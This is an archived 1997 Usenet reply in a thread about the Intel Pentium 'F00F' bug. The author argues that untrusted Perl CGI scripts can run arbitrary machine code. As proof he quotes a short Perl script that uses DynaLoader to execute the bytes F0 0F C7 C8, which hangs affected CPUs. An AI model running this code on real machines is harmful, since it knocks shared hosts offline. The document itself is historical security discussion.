home *** CD-ROM | disk | FTP | other *** search
/ linuxmafia.com 2016 / linuxmafia.com.tar / linuxmafia.com / pub / linux / security / f00f / F00F-in-perl.txt < prev    next >
Internet Message Format  |  1997-11-17  |  2KB
  1. From myrddin.imat.com!miwok!ultra.sonic.net!pushkin.conxion.com!news.he.net!news-peer.gip.net!news.gsl.net!gip.net!howland.erols.net!news2.digex.net!digex!lynx.unm.edu!fugu!mr2.mst6.lanl.gov!nntp-server.caltech.edu!not-for-mail Tue Nov 18 10:42:19 1997
  2. Path: myrddin.imat.com!miwok!ultra.sonic.net!pushkin.conxion.com!news.he.net!news-peer.gip.net!news.gsl.net!gip.net!howland.erols.net!news2.digex.net!digex!lynx.unm.edu!fugu!mr2.mst6.lanl.gov!nntp-server.caltech.edu!not-for-mail
  3. From: Shimpei Yamashita <shimpei@socrates.caltech.edu>
  4. Newsgroups: comp.os.linux.advocacy,comp.sys.intel
  5. Subject: Re: F0 0F C7 C8 looks worse than FPIV
  6. Date: 12 Nov 1997 14:27:50 GMT
  7. Organization: Hummingbird Heaven
  8. Lines: 28
  9. Message-ID: <64ced6$eqf@gap.cco.caltech.edu>
  10. References: <3462ADCD.135B@noname.com> <6485o3$n68$2@central.server.swt.edu> <648tke$218@gap.cco.caltech.edu> <64c9dp$18c$2@newbabylon.rs.itd.umich.edu>
  11. Reply-To: Shimpei Yamashita <shimpei@socrates.caltech.edu>
  12. NNTP-Posting-Host: socrates.patnet.caltech.edu
  13. X-Original-Newsgroups: comp.os.linux.advocacy,comp.sys.intel
  14. X-Newsreader: trn 4.0-test60 (5 October 1997)
  15. Originator: shimpei@socrates.caltech.edu (Shimpei Yamashita)
  16. Xref: myrddin.imat.com comp.os.linux.advocacy:104577 comp.sys.intel:43494
  17.  
  18. Hasdi Rodzmann Hashim <hasdi@umich.edu> writes:
  19. >
  20. >Shimpei Yamashita (shimpei@socrates.caltech.edu) wrote:
  21. >: Um, did you see my post in context? I was responding to a post that
  22. >: was discussing ISP hosting CGI scripts. Those are usually untrusted.
  23. >                 ^^^^^^^
  24. >: I'd hate to be the ISP that has to host CGI scripts, but in this day
  25. >: and age, you just can't survive in the ISP market without allowing CGI
  26. >: scripts for web pages. 
  27. >
  28. >Uhm. If you are talking about PERL scripts, I don't see how you can
  29. >execute arbitrary machine code with it. 
  30.  
  31. Sure you can. Here's the cleanest example I've seen so far:
  32.  
  33. >From: Gisle Aas <aas@sn.no>
  34. >Newsgroups: comp.sys.intel
  35. >Subject: Re: F0 0F C7 C8 looks worse than FPIV
  36. >Date: 11 Nov 1997 14:09:29 +0100
  37. >
  38. >#!/usr/bin/perl
  39. >require DynaLoader;
  40. >DynaLoader::dl_install_xsub("main::hangme",
  41. >                             unpack("I", pack("P4", "\xF0\x0F\xC7\xC8")));
  42. >hangme();
  43.  
  44. -- 
  45. Shimpei Yamashita                <http://www.patnet.caltech.edu/%7Eshimpei/>
  46.  
  47.